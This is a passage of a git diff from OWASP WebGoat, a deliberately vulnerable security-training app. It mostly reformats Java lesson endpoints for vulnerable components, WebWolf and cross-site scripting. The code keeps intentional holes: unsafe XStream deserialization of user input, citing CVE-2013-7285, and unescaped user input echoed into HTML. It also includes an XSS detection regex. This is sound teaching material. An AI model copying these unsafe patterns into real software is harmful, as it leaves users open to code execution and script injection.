-    AttackResult completed(@RequestParam String payload) {
-        XStream xstream = new XStream();
-        xstream.setClassLoader(Contact.class.getClassLoader());
-        xstream.alias("contact", ContactImpl.class);
-        xstream.ignoreUnknownElements();
-        Contact contact = null;
+  @PostMapping("/VulnerableComponents/attack1")
+  public @ResponseBody AttackResult completed(@RequestParam String payload) {
+    XStream xstream = new XStream();
+    xstream.setClassLoader(Contact.class.getClassLoader());
+    xstream.alias("contact", ContactImpl.class);
+    xstream.ignoreUnknownElements();
+    Contact contact = null;
 
-        try {
-            if (!StringUtils.isEmpty(payload)) {
-                payload = payload.replace("+", "").replace("\r", "").replace("\n", "").replace("> ", ">").replace(" <", "<");
-            }
-            contact = (Contact) xstream.fromXML(payload);
-        } catch (Exception ex) {
-            return failed(this).feedback("vulnerable-components.close").output(ex.getMessage()).build();
-        }
-
-        try {
-            if (null != contact) {
-                contact.getFirstName();//trigger the example like https://x-stream.github.io/CVE-2013-7285.html
-            }
-            if (!(contact instanceof ContactImpl)) {
-                return success(this).feedback("vulnerable-components.success").build();
-            }
-        } catch (Exception e) {
-            return success(this).feedback("vulnerable-components.success").output(e.getMessage()).build();
-        }
-        return failed(this).feedback("vulnerable-components.fromXML").feedbackArgs(contact).build();
+    try {
+      if (!StringUtils.isEmpty(payload)) {
+        payload =
+            payload
+                .replace("+", "")
+                .replace("\r", "")
+                .replace("\n", "")
+                .replace("> ", ">")
+                .replace(" <", "<");
+      }
+      contact = (Contact) xstream.fromXML(payload);
+    } catch (Exception ex) {
+      return failed(this).feedback("vulnerable-components.close").output(ex.getMessage()).build();
     }
+
+    try {
+      if (null != contact) {
+        contact.getFirstName(); // trigger the example like
+        // https://x-stream.github.io/CVE-2013-7285.html
+      }
+      if (!(contact instanceof ContactImpl)) {
+        return success(this).feedback("vulnerable-components.success").build();
+      }
+    } catch (Exception e) {
+      return success(this).feedback("vulnerable-components.success").output(e.getMessage()).build();
+    }
+    return failed(this).feedback("vulnerable-components.fromXML").feedbackArgs(contact).build();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/webgoatintroduction/WebGoatIntroduction.java b/src/main/java/org/owasp/webgoat/lessons/webgoatintroduction/WebGoatIntroduction.java
index 35c876700..6c2171e9a 100644
--- a/src/main/java/org/owasp/webgoat/lessons/webgoatintroduction/WebGoatIntroduction.java
+++ b/src/main/java/org/owasp/webgoat/lessons/webgoatintroduction/WebGoatIntroduction.java
@@ -8,25 +8,26 @@ import org.springframework.stereotype.Component;
  * ************************************************************************************************
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
  * please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under the terms of the
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
  * GNU General Public License as published by the Free Software Foundation; either version 2 of the
  * License, or (at your option) any later version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * <p>
- * You should have received a copy of the GNU General Public License along with this program; if
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
  * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
  * 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
+ *
  * <p>
  *
  * @author WebGoat
@@ -35,14 +36,13 @@ import org.springframework.stereotype.Component;
  */
 @Component
 public class WebGoatIntroduction extends Lesson {
-    @Override
-    public Category getDefaultCategory() {
-        return Category.INTRODUCTION;
-    }
-
-    @Override
-    public String getTitle() {
-        return "webgoat.title";
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.INTRODUCTION;
+  }
 
+  @Override
+  public String getTitle() {
+    return "webgoat.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/webwolfintroduction/Email.java b/src/main/java/org/owasp/webgoat/lessons/webwolfintroduction/Email.java
index 524384689..b1a3442b3 100644
--- a/src/main/java/org/owasp/webgoat/lessons/webwolfintroduction/Email.java
+++ b/src/main/java/org/owasp/webgoat/lessons/webwolfintroduction/Email.java
@@ -1,16 +1,15 @@
 package org.owasp.webgoat.lessons.webwolfintroduction;
 
+import java.io.Serializable;
 import lombok.Builder;
 import lombok.Data;
 
-import java.io.Serializable;
-
 @Builder
 @Data
 public class Email implements Serializable {
 
-    private String contents;
-    private String sender;
-    private String title;
-    private String recipient;
+  private String contents;
+  private String sender;
+  private String title;
+  private String recipient;
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/webwolfintroduction/LandingAssignment.java b/src/main/java/org/owasp/webgoat/lessons/webwolfintroduction/LandingAssignment.java
index a7243d07d..c6e9e0493 100644
--- a/src/main/java/org/owasp/webgoat/lessons/webwolfintroduction/LandingAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/webwolfintroduction/LandingAssignment.java
@@ -22,6 +22,9 @@
 
 package org.owasp.webgoat.lessons.webwolfintroduction;
 
+import java.net.URI;
+import java.net.URISyntaxException;
+import javax.servlet.http.HttpServletRequest;
 import org.apache.commons.lang3.StringUtils;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AttackResult;
@@ -32,10 +35,6 @@ import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 import org.springframework.web.servlet.ModelAndView;
 
-import javax.servlet.http.HttpServletRequest;
-import java.net.URI;
-import java.net.URISyntaxException;
-
 /**
  * @author nbaars
  * @since 8/20/17.
@@ -43,27 +42,26 @@ import java.net.URISyntaxException;
 @RestController
 public class LandingAssignment extends AssignmentEndpoint {
 
-    @Value("${webwolf.landingpage.url}")
-    private String landingPageUrl;
+  @Value("${webwolf.landingpage.url}")
+  private String landingPageUrl;
 
-    @PostMapping("/WebWolf/landing")
-    @ResponseBody
-    public AttackResult click(String uniqueCode) {
-        if (StringUtils.reverse(getWebSession().getUserName()).equals(uniqueCode)) {
-            return success(this).build();
-        }
-        return failed(this).feedback("webwolf.landing_wrong").build();
+  @PostMapping("/WebWolf/landing")
+  @ResponseBody
+  public AttackResult click(String uniqueCode) {
+    if (StringUtils.reverse(getWebSession().getUserName()).equals(uniqueCode)) {
+      return success(this).build();
     }
+    return failed(this).feedback("webwolf.landing_wrong").build();
+  }
 
+  @GetMapping("/WebWolf/landing/password-reset")
+  public ModelAndView openPasswordReset(HttpServletRequest request) throws URISyntaxException {
+    URI uri = new URI(request.getRequestURL().toString());
+    ModelAndView modelAndView = new ModelAndView();
+    modelAndView.addObject("webwolfUrl", landingPageUrl);
+    modelAndView.addObject("uniqueCode", StringUtils.reverse(getWebSession().getUserName()));
 
-    @GetMapping("/WebWolf/landing/password-reset")
-    public ModelAndView openPasswordReset(HttpServletRequest request) throws URISyntaxException {
-        URI uri = new URI(request.getRequestURL().toString());
-        ModelAndView modelAndView = new ModelAndView();
-        modelAndView.addObject("webwolfUrl", landingPageUrl);
-        modelAndView.addObject("uniqueCode", StringUtils.reverse(getWebSession().getUserName()));
-
-        modelAndView.setViewName("lessons/webwolfintroduction/templates/webwolfPasswordReset.html");
-        return modelAndView;
-    }
+    modelAndView.setViewName("lessons/webwolfintroduction/templates/webwolfPasswordReset.html");
+    return modelAndView;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/webwolfintroduction/MailAssignment.java b/src/main/java/org/owasp/webgoat/lessons/webwolfintroduction/MailAssignment.java
index ec5b1c6a6..8dd168d6e 100644
--- a/src/main/java/org/owasp/webgoat/lessons/webwolfintroduction/MailAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/webwolfintroduction/MailAssignment.java
@@ -40,43 +40,53 @@ import org.springframework.web.client.RestTemplate;
 @RestController
 public class MailAssignment extends AssignmentEndpoint {
 
-    private final String webWolfURL;
-    private RestTemplate restTemplate;
+  private final String webWolfURL;
+  private RestTemplate restTemplate;
 
-    public MailAssignment(RestTemplate restTemplate, @Value("${webwolf.mail.url}") String webWolfURL) {
-        this.restTemplate = restTemplate;
-        this.webWolfURL = webWolfURL;
-    }
+  public MailAssignment(
+      RestTemplate restTemplate, @Value("${webwolf.mail.url}") String webWolfURL) {
+    this.restTemplate = restTemplate;
+    this.webWolfURL = webWolfURL;
+  }
 
-    @PostMapping("/WebWolf/mail/send")
-    @ResponseBody
-    public AttackResult sendEmail(@RequestParam String email) {
-        String username = email.substring(0, email.indexOf("@"));
-        if (username.equalsIgnoreCase(getWebSession().getUserName())) {
-            Email mailEvent = Email.builder()
-                    .recipient(username)
-                    .title("Test messages from WebWolf")
-                    .contents("This is a test message from WebWolf, your unique code is: " + StringUtils.reverse(username))
-                    .sender("webgoat@owasp.org")
-                    .build();
-            try {
-                restTemplate.postForEntity(webWolfURL, mailEvent, Object.class);
-            } catch (RestClientException e ) {
-                return informationMessage(this).feedback("webwolf.email_failed").output(e.getMessage()).build();
-            }
-            return informationMessage(this).feedback("webwolf.email_send").feedbackArgs(email).build();
-        } else {
-            return informationMessage(this).feedback("webwolf.email_mismatch").feedbackArgs(username).build();
-        }
+  @PostMapping("/WebWolf/mail/send")
+  @ResponseBody
+  public AttackResult sendEmail(@RequestParam String email) {
+    String username = email.substring(0, email.indexOf("@"));
+    if (username.equalsIgnoreCase(getWebSession().getUserName())) {
+      Email mailEvent =
+          Email.builder()
+              .recipient(username)
+              .title("Test messages from WebWolf")
+              .contents(
+                  "This is a test message from WebWolf, your unique code is: "
+                      + StringUtils.reverse(username))
+              .sender("webgoat@owasp.org")
+              .build();
+      try {
+        restTemplate.postForEntity(webWolfURL, mailEvent, Object.class);
+      } catch (RestClientException e) {
+        return informationMessage(this)
+            .feedback("webwolf.email_failed")
+            .output(e.getMessage())
+            .build();
+      }
+      return informationMessage(this).feedback("webwolf.email_send").feedbackArgs(email).build();
+    } else {
+      return informationMessage(this)
+          .feedback("webwolf.email_mismatch")
+          .feedbackArgs(username)
+          .build();
     }
+  }
 
-    @PostMapping("/WebWolf/mail")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String uniqueCode) {
-        if (uniqueCode.equals(StringUtils.reverse(getWebSession().getUserName()))) {
-            return success(this).build();
-        } else {
-            return failed(this).feedbackArgs("webwolf.code_incorrect").feedbackArgs(uniqueCode).build();
-        }
+  @PostMapping("/WebWolf/mail")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String uniqueCode) {
+    if (uniqueCode.equals(StringUtils.reverse(getWebSession().getUserName()))) {
+      return success(this).build();
+    } else {
+      return failed(this).feedbackArgs("webwolf.code_incorrect").feedbackArgs(uniqueCode).build();
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/webwolfintroduction/WebWolfIntroduction.java b/src/main/java/org/owasp/webgoat/lessons/webwolfintroduction/WebWolfIntroduction.java
index 240132413..39fe97e2d 100644
--- a/src/main/java/org/owasp/webgoat/lessons/webwolfintroduction/WebWolfIntroduction.java
+++ b/src/main/java/org/owasp/webgoat/lessons/webwolfintroduction/WebWolfIntroduction.java
@@ -28,14 +28,13 @@ import org.springframework.stereotype.Component;
 
 @Component
 public class WebWolfIntroduction extends Lesson {
-    @Override
-    public Category getDefaultCategory() {
-        return Category.INTRODUCTION;
-    }
-
-    @Override
-    public String getTitle() {
-        return "webwolf.title";
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.INTRODUCTION;
+  }
 
+  @Override
+  public String getTitle() {
+    return "webwolf.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/xss/Comment.java b/src/main/java/org/owasp/webgoat/lessons/xss/Comment.java
index eea482a34..b0b719b21 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xss/Comment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/Comment.java
@@ -1,12 +1,11 @@
 package org.owasp.webgoat.lessons.xss;
 
+import javax.xml.bind.annotation.XmlRootElement;
 import lombok.AllArgsConstructor;
 import lombok.Getter;
 import lombok.NoArgsConstructor;
 import lombok.Setter;
 
-import javax.xml.bind.annotation.XmlRootElement;
-
 /**
  * @author nbaars
  * @since 4/8/17.
@@ -17,8 +16,7 @@ import javax.xml.bind.annotation.XmlRootElement;
 @NoArgsConstructor
 @XmlRootElement
 public class Comment {
-    private String user;
-    private String dateTime;
-    private String text;
+  private String user;
+  private String dateTime;
+  private String text;
 }
-
diff --git a/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScripting.java b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScripting.java
index 308ff6221..9068e030f 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScripting.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScripting.java
@@ -28,13 +28,13 @@ import org.springframework.stereotype.Component;
 
 @Component
 public class CrossSiteScripting extends Lesson {
-    @Override
-    public Category getDefaultCategory() {
-        return Category.A3;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.A3;
+  }
 
-    @Override
-    public String getTitle() {
-        return "xss.title";
-    }
+  @Override
+  public String getTitle() {
+    return "xss.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson1.java b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson1.java
index c6326eb97..114632ef5 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson1.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson1.java
@@ -1,4 +1,3 @@
-
 /*
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
  *
@@ -30,17 +29,17 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-
 @RestController
 public class CrossSiteScriptingLesson1 extends AssignmentEndpoint {
 
-    @PostMapping("/CrossSiteScripting/attack1")
-    @ResponseBody
-    public AttackResult completed(@RequestParam(value = "checkboxAttack1", required = false) String checkboxValue) {
-        if (checkboxValue != null) {
-            return success(this).build();
-        } else {
-            return failed(this).feedback("xss.lesson1.failure").build();
-        }
+  @PostMapping("/CrossSiteScripting/attack1")
+  @ResponseBody
+  public AttackResult completed(
+      @RequestParam(value = "checkboxAttack1", required = false) String checkboxValue) {
+    if (checkboxValue != null) {
+      return success(this).build();
+    } else {
+      return failed(this).feedback("xss.lesson1.failure").build();
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson3.java b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson3.java
index b5a643e73..fcd9138da 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson3.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson3.java
@@ -31,48 +31,59 @@ import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 
-//@RestController
+// @RestController
 @Deprecated
-//TODO This assignment seems not to be in use in the UI
+// TODO This assignment seems not to be in use in the UI
 // it is there to make sure the lesson can be marked complete
 // in order to restore it, make it accessible through the UI and uncomment RestController
-@AssignmentHints(value = {"xss-mitigation-3-hint1", "xss-mitigation-3-hint2", "xss-mitigation-3-hint3", "xss-mitigation-3-hint4"})
+@AssignmentHints(
+    value = {
+      "xss-mitigation-3-hint1",
+      "xss-mitigation-3-hint2",
+      "xss-mitigation-3-hint3",
+      "xss-mitigation-3-hint4"
+    })
 public class CrossSiteScriptingLesson3 extends AssignmentEndpoint {
 
-    @PostMapping("/CrossSiteScripting/attack3")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String editor) {
-        String unescapedString = org.jsoup.parser.Parser.unescapeEntities(editor, true);
-        try {
-            if (editor.isEmpty()) return failed(this).feedback("xss-mitigation-3-no-code").build();
-            Document doc = Jsoup.parse(unescapedString);
-            String[] lines = unescapedString.split("<html>");
+  @PostMapping("/CrossSiteScripting/attack3")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String editor) {
+    String unescapedString = org.jsoup.parser.Parser.unescapeEntities(editor, true);
+    try {
+      if (editor.isEmpty()) return failed(this).feedback("xss-mitigation-3-no-code").build();
+      Document doc = Jsoup.parse(unescapedString);
+      String[] lines = unescapedString.split("<html>");
 
-            String include = (lines[0]);
-            String fistNameElement = doc.select("body > table > tbody > tr:nth-child(1) > td:nth-child(2)").first().text();
-            String lastNameElement = doc.select("body > table > tbody > tr:nth-child(2) > td:nth-child(2)").first().text();
+      String include = (lines[0]);
+      String fistNameElement =
+          doc.select("body > table > tbody > tr:nth-child(1) > td:nth-child(2)").first().text();
+      String lastNameElement =
+          doc.select("body > table > tbody > tr:nth-child(2) > td:nth-child(2)").first().text();
 
-            Boolean includeCorrect = false;
-            Boolean firstNameCorrect = false;
-            Boolean lastNameCorrect = false;
+      Boolean includeCorrect = false;
+      Boolean firstNameCorrect = false;
+      Boolean lastNameCorrect = false;
 
-            if (include.contains("<%@") && include.contains("taglib") && include.contains("uri=\"https://www.owasp.org/index.php/OWASP_Java_Encoder_Project\"") && include.contains("%>")) {
-                includeCorrect = true;
-            }
-            if (fistNameElement.equals("${e:forHtml(param.first_name)}")) {
-                firstNameCorrect = true;
-            }
-            if (lastNameElement.equals("${e:forHtml(param.last_name)}")) {
-                lastNameCorrect = true;
-            }
+      if (include.contains("<%@")
+          && include.contains("taglib")
+          && include.contains("uri=\"https://www.owasp.org/index.php/OWASP_Java_Encoder_Project\"")
+          && include.contains("%>")) {
+        includeCorrect = true;
+      }
+      if (fistNameElement.equals("${e:forHtml(param.first_name)}")) {
+        firstNameCorrect = true;
+      }
+      if (lastNameElement.equals("${e:forHtml(param.last_name)}")) {
+        lastNameCorrect = true;
+      }
 
-            if (includeCorrect && firstNameCorrect && lastNameCorrect) {
-                return success(this).feedback("xss-mitigation-3-success").build();
-            } else {
-                return failed(this).feedback("xss-mitigation-3-failure").build();
-            }
-        } catch (Exception e) {
-            return failed(this).output(e.getMessage()).build();
-        }
+      if (includeCorrect && firstNameCorrect && lastNameCorrect) {
+        return success(this).feedback("xss-mitigation-3-success").build();
+      } else {
+        return failed(this).feedback("xss-mitigation-3-failure").build();
+      }
+    } catch (Exception e) {
+      return failed(this).output(e.getMessage()).build();
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson4.java b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson4.java
index d6df6b1fc..7a487471e 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson4.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson4.java
@@ -30,33 +30,35 @@ import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 
-//@RestController
+// @RestController
 @Deprecated
-//TODO This assignment seems not to be in use in the UI
-//it is there to make sure the lesson can be marked complete
-//in order to restore it, make it accessible through the UI and uncomment RestController@Slf4j
+// TODO This assignment seems not to be in use in the UI
+// it is there to make sure the lesson can be marked complete
+// in order to restore it, make it accessible through the UI and uncomment RestController@Slf4j
 @Slf4j
 @AssignmentHints(value = {"xss-mitigation-4-hint1"})
 public class CrossSiteScriptingLesson4 extends AssignmentEndpoint {
 
-    @PostMapping("/CrossSiteScripting/attack4")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String editor2) {
+  @PostMapping("/CrossSiteScripting/attack4")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String editor2) {
 
-        String editor = editor2.replaceAll("\\<.*?>", "");
-        log.debug(editor);
+    String editor = editor2.replaceAll("\\<.*?>", "");
+    log.debug(editor);
 
-        if ((editor.contains("Policy.getInstance(\"antisamy-slashdot.xml\"") || editor.contains(".scan(newComment, \"antisamy-slashdot.xml\"") || editor.contains(".scan(newComment, new File(\"antisamy-slashdot.xml\")")) &&
-                editor.contains("new AntiSamy();") &&
-                editor.contains(".scan(newComment,") &&
-                editor.contains("CleanResults") &&
-                editor.contains("MyCommentDAO.addComment(threadID, userID") &&
-                editor.contains(".getCleanHTML());")) {
-            log.debug("true");
-            return success(this).feedback("xss-mitigation-4-success").build();
-        } else {
-            log.debug("false");
-            return failed(this).feedback("xss-mitigation-4-failed").build();
-        }
+    if ((editor.contains("Policy.getInstance(\"antisamy-slashdot.xml\"")
+            || editor.contains(".scan(newComment, \"antisamy-slashdot.xml\"")
+            || editor.contains(".scan(newComment, new File(\"antisamy-slashdot.xml\")"))
+        && editor.contains("new AntiSamy();")
+        && editor.contains(".scan(newComment,")
+        && editor.contains("CleanResults")
+        && editor.contains("MyCommentDAO.addComment(threadID, userID")
+        && editor.contains(".getCleanHTML());")) {
+      log.debug("true");
+      return success(this).feedback("xss-mitigation-4-success").build();
+    } else {
+      log.debug("false");
+      return failed(this).feedback("xss-mitigation-4-failed").build();
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson5a.java b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson5a.java
index 9a7c1135a..9807d8d4e 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson5a.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson5a.java
@@ -1,4 +1,3 @@
-
 /*
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
  *
@@ -23,6 +22,8 @@
 
 package org.owasp.webgoat.lessons.xss;
 
+import java.util.function.Predicate;
+import java.util.regex.Pattern;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
 import org.owasp.webgoat.container.assignments.AttackResult;
@@ -33,58 +34,70 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.util.function.Predicate;
-import java.util.regex.Pattern;
-
-
 @RestController
-@AssignmentHints(value = {"xss-reflected-5a-hint-1", "xss-reflected-5a-hint-2", "xss-reflected-5a-hint-3", "xss-reflected-5a-hint-4"})
+@AssignmentHints(
+    value = {
+      "xss-reflected-5a-hint-1",
+      "xss-reflected-5a-hint-2",
+      "xss-reflected-5a-hint-3",
+      "xss-reflected-5a-hint-4"
+    })
 public class CrossSiteScriptingLesson5a extends AssignmentEndpoint {
 
-    public static final Predicate<String> XSS_PATTERN = Pattern.compile(
-            ".*<script>(console\\.log|alert)\\(.*\\);?</script>.*"
-            , Pattern.CASE_INSENSITIVE).asMatchPredicate();
-    @Autowired
-    UserSessionData userSessionData;
+  public static final Predicate<String> XSS_PATTERN =
+      Pattern.compile(
+              ".*<script>(console\\.log|alert)\\(.*\\);?</script>.*", Pattern.CASE_INSENSITIVE)
+          .asMatchPredicate();
+  @Autowired UserSessionData userSessionData;
 
-    @GetMapping("/CrossSiteScripting/attack5a")
-    @ResponseBody
-    public AttackResult completed(@RequestParam Integer QTY1,
-                                  @RequestParam Integer QTY2, @RequestParam Integer QTY3,
-                                  @RequestParam Integer QTY4, @RequestParam String field1,
-                                  @RequestParam String field2) {
+  @GetMapping("/CrossSiteScripting/attack5a")
+  @ResponseBody
+  public AttackResult completed(
+      @RequestParam Integer QTY1,
+      @RequestParam Integer QTY2,
+      @RequestParam Integer QTY3,
+      @RequestParam Integer QTY4,
+      @RequestParam String field1,
+      @RequestParam String field2) {
 
-        if (XSS_PATTERN.test(field2)) {
-            return failed(this).feedback("xss-reflected-5a-failed-wrong-field").build();
-        }
-
-        double totalSale = QTY1.intValue() * 69.99 + QTY2.intValue() * 27.99 + QTY3.intValue() * 1599.99 + QTY4.intValue() * 299.99;
-
-        userSessionData.setValue("xss-reflected1-complete", "false");
-        StringBuilder cart = new StringBuilder();
-        cart.append("Thank you for shopping at WebGoat. <br />Your support is appreciated<hr />");
-        cart.append("<p>We have charged credit card:" + field1 + "<br />");
-        cart.append("                             ------------------- <br />");
-        cart.append("                               $" + totalSale);
-
-        //init state
-        if (userSessionData.getValue("xss-reflected1-complete") == null) {
-            userSessionData.setValue("xss-reflected1-complete", "false");
-        }
-
-        if (XSS_PATTERN.test(field1)) {
-            userSessionData.setValue("xss-reflected-5a-complete", "true");
-            if (field1.toLowerCase().contains("console.log")) {
-                return success(this).feedback("xss-reflected-5a-success-console").output(cart.toString()).build();
-            } else {
-                return success(this).feedback("xss-reflected-5a-success-alert").output(cart.toString()).build();
-            }
-        } else {
-            userSessionData.setValue("xss-reflected1-complete", "false");
-            return failed(this)
-                    .feedback("xss-reflected-5a-failure")
-                    .output(cart.toString())
-                    .build();
-        }
+    if (XSS_PATTERN.test(field2)) {
+      return failed(this).feedback("xss-reflected-5a-failed-wrong-field").build();
     }
+
+    double totalSale =
+        QTY1.intValue() * 69.99
+            + QTY2.intValue() * 27.99
+            + QTY3.intValue() * 1599.99
+            + QTY4.intValue() * 299.99;
+
+    userSessionData.setValue("xss-reflected1-complete", "false");
+    StringBuilder cart = new StringBuilder();
+    cart.append("Thank you for shopping at WebGoat. <br />Your support is appreciated<hr />");
+    cart.append("<p>We have charged credit card:" + field1 + "<br />");
+    cart.append("                             ------------------- <br />");
+    cart.append("                               $" + totalSale);
+
+    // init state
+    if (userSessionData.getValue("xss-reflected1-complete") == null) {
+      userSessionData.setValue("xss-reflected1-complete", "false");
+    }
+
+    if (XSS_PATTERN.test(field1)) {
+      userSessionData.setValue("xss-reflected-5a-complete", "true");
+      if (field1.toLowerCase().contains("console.log")) {
+        return success(this)
+            .feedback("xss-reflected-5a-success-console")
+            .output(cart.toString())
+            .build();
+      } else {
+        return success(this)
+            .feedback("xss-reflected-5a-success-alert")
+            .output(cart.toString())
+            .build();
+      }
+    } else {
+      userSessionData.setValue("xss-reflected1-complete", "false");
+      return failed(this).feedback("xss-reflected-5a-failure").output(cart.toString()).build();
+    }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson6a.java b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson6a.java
index ce8f2f620..d0252280c 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson6a.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson6a.java
@@ -1,4 +1,3 @@
-
 /*
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
  *
@@ -33,23 +32,26 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-
 @RestController
-@AssignmentHints(value = {"xss-reflected-6a-hint-1", "xss-reflected-6a-hint-2", "xss-reflected-6a-hint-3", "xss-reflected-6a-hint-4"})
+@AssignmentHints(
+    value = {
+      "xss-reflected-6a-hint-1",
+      "xss-reflected-6a-hint-2",
+      "xss-reflected-6a-hint-3",
+      "xss-reflected-6a-hint-4"
+    })
 public class CrossSiteScriptingLesson6a extends AssignmentEndpoint {
-    @Autowired
-    UserSessionData userSessionData;
+  @Autowired UserSessionData userSessionData;
 
-    @PostMapping("/CrossSiteScripting/attack6a")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String DOMTestRoute) {
+  @PostMapping("/CrossSiteScripting/attack6a")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String DOMTestRoute) {
 
-        if (DOMTestRoute.matches("start\\.mvc#test(\\/|)")) {
-            //return )
-            return success(this).feedback("xss-reflected-6a-success").build();
-        } else {
-            return failed(this).feedback("xss-reflected-6a-failure").build();
-        }
+    if (DOMTestRoute.matches("start\\.mvc#test(\\/|)")) {
+      // return )
+      return success(this).feedback("xss-reflected-6a-success").build();
+    } else {
+      return failed(this).feedback("xss-reflected-6a-failure").build();
     }
-
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingMitigation.java b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingMitigation.java
index 2515d7e0c..89977ea79 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingMitigation.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingMitigation.java
@@ -26,13 +26,13 @@ import org.owasp.webgoat.container.lessons.Category;
 import org.owasp.webgoat.container.lessons.Lesson;
 
 public class CrossSiteScriptingMitigation extends Lesson {
-    @Override
-    public Category getDefaultCategory() {
-        return Category.A3;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.A3;
+  }
 
-    @Override
-    public String getTitle() {
-        return "xss-mitigation.title";
-    }
+  @Override
+  public String getTitle() {
+    return "xss-mitigation.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingQuiz.java b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingQuiz.java
index 7612f559a..e193d262a 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingQuiz.java
